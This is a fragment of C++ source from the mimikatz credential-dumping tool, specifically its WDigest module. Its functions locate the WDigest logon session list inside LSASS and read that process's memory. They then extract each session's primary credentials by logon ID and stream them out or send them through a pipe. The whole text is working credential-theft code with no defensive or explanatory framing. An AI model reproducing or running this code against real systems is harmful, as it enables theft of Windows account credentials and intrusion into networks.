__kextdll bool __cdecl getWDigestFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) { wostringstream monStream; monStream << L"** wdigest.dll/lsasrv.dll ** ; Research Status : " << (searchWDigestEntryList() ? L"OK :)" : L"KO :(") << endl << endl << L"@l_LogSessList = " << l_LogSessList << endl << L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl; return sendTo(monPipe, monStream.str()); }
bool WINAPI getWDigestLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) { wostringstream maReponse; if(searchWDigestEntryList()) { PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; if(PKIWI_WDIGEST_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_WDIGEST_LIST_ENTRY>(getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))) { mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(pLogSession) + offsetWDigestPrimary); } genericCredsToStream(&maReponse, mesCreds, justSecurity); } else maReponse << L"n.a. (wdigest KO)"; return sendTo(monPipe, maReponse.str()); }
bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity) { if(searchWDigestEntryList()) { PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL); BYTE * monBuff = new BYTE[taille]; if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId)) if( mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(reinterpret_cast<PBYTE>(monBuff) + offsetWDigestPrimary); mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); delete [] monBuff; } else (*outputStream) << L"n.a. (wdigest KO)"; return true; }